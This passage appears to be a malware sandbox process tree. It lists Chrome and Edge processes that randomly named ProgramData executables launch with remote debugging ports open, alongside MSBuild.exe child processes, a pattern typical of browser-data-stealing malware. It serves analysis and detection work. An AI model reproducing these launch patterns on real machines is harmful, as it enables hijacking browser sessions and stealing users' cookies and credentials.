        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2420,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2416 /prefetch:2
        10⤵
        
        PID:2956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2028,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2556 /prefetch:8
        10⤵
        
        PID:5524
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3288 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3312 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:3608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4412,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3784 /prefetch:2
        10⤵
        Uses browser remote debugging
        
        PID:4384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4696 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:4692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:1988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffebd8ddcf8,0x7ffebd8ddd04,0x7ffebd8ddd10
        10⤵
        
        PID:3448
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1580,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3
        10⤵
        
        PID:232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:2
        10⤵
        
        PID:5516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2412,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=1836 /prefetch:8
        10⤵
        
        PID:3716
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=3268 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:4480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:2624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:2
        10⤵
        Uses browser remote debugging
        
        PID:2584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4452,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:1792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2084,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:2
        10⤵
        
        PID:11436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:8
        10⤵
        
        PID:11980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5916,i,15117193962475876350,5457355569211871078,262144 --variations-seed-version --mojo-platform-channel-handle=2328 /prefetch:8
        10⤵
        
        PID:6672
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:9280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:9412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ffebb64f208,0x7ffebb64f214,0x7ffebb64f220
        11⤵
        
        PID:9508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1980,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=1896 /prefetch:2
        11⤵
        
        PID:11096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2004,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:3
        11⤵
        
        PID:11132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1860,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:8
        11⤵
        
        PID:11456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:12044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:12052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5204,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
        11⤵
        
        PID:10664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5228,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
        11⤵
        
        PID:7500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=5712 /prefetch:8
        11⤵
        
        PID:7612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5820,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:8
        11⤵
        
        PID:11900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5820,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:8
        11⤵
        
        PID:12084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6400,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=6332 /prefetch:8
        11⤵
        
        PID:7976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6656,i,17544536673062321869,886999287893939130,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:8
        11⤵
        
        PID:8856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:13016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:12956
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:10876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:11476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffebca7f208,0x7ffebca7f214,0x7ffebca7f220
        11⤵
        
        PID:6432
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=272,i,17446459965923963875,4930999510250487916,262144 --variations-seed-version --mojo-platform-channel-handle=2740 /prefetch:3
        11⤵
        
        PID:12420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2636,i,17446459965923963875,4930999510250487916,262144 --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:2
        11⤵
        
        PID:4660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2156,i,17446459965923963875,4930999510250487916,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:8
        11⤵
        
        PID:4576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3400,i,17446459965923963875,4930999510250487916,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:7404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,17446459965923963875,4930999510250487916,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:12944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:6736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:7864
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffebca7f208,0x7ffebca7f214,0x7ffebca7f220
        11⤵
        
        PID:5568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=2492 /prefetch:3
        11⤵
        
        PID:5336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2464,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:2
        11⤵
        
        PID:10236
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2124,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:8
        11⤵
        
        PID:10252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3412,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:1892
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:10960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3808,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:8
        11⤵
        
        PID:4292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4504,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=4832 /prefetch:8
        11⤵
        
        PID:3564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5188,i,16818143497585322589,12988126269925680188,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:8
        11⤵
        
        PID:6772
        
        C:\ProgramData\vs00zcjwlf.exe
        
        "C:\ProgramData\vs00zcjwlf.exe"
        9⤵
        
        PID:7508
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:9792
        
        C:\ProgramData\v3o8y5pp8q.exe
        
        "C:\ProgramData\v3o8y5pp8q.exe"
        9⤵
        
        PID:10048
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:3732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        11⤵
        Uses browser remote debugging
        
        PID:17284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffecbfcdcf8,0x7ffecbfcdd04,0x7ffecbfcdd10
        12⤵
        
        PID:17336
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2116,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:2
        12⤵
        
        PID:4996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1912,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
        12⤵
        
        PID:11956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2424,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=2436 /prefetch:8
        12⤵
        
        PID:6304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,11540668994376621911,6497465023834953040,262144 --variations-seed-version --mojo-platform-channel-handle=3228 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:3496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
